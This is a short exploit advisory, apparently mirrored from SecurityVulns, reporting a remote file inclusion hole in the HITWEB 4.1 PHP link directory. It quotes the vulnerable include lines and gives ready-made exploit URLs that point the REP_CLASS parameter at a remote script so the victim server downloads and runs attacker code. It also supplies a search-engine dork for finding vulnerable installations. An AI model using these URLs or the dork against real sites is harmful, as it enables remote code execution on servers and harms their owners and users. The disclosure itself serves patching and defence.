SecurityvulnsSECURITYVULNS:DOC:14874HITWEB Remote File Include
#################################
HITWEB 4.1
#################################
#Class: Remote|Local File Include Vulnerability
Remote: Yes
Local: No
Type: High
#site:http://www.hitweb.org/
Site Download: http://www.lbb.org/cgi-bin/script/telecharger.cgi?ID=2919
Author: x_w0x
Contact: [email protected]
###################################
#Vuln Code
=================addlink.php3================
include "$REP_CLASS/template.inc"
include "$REP_CLASS/class.http_storage".$EXT_PHP ;
include "$REP_CLASS/class.hitweb".$EXT_PHP ;
include "admin/$REP_LANG_ADMIN/$LANG_ADMIN".
include "$REP_INC/lib_database.php3"
==============appreciation.php3===============
include "$REP_CLASS/template.inc"
==============genpage.php3================
include "$REP_INC/lib_database.php3"
============refererpoint.php3================
include "$REP_CLASS/template.inc" #
####################################
£xploit:
http://www.victim.com/[path]/addlink.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/genpage.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/refererpoint.php3?REP_CLASS=http://DarknesseScript.txt
#Dork : "Copyright © 1998 - 2004 Brian FRAVAL"
#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0k, and elite-team
#w£lc0m£ In x0|0x
#by x_w0x
############################################################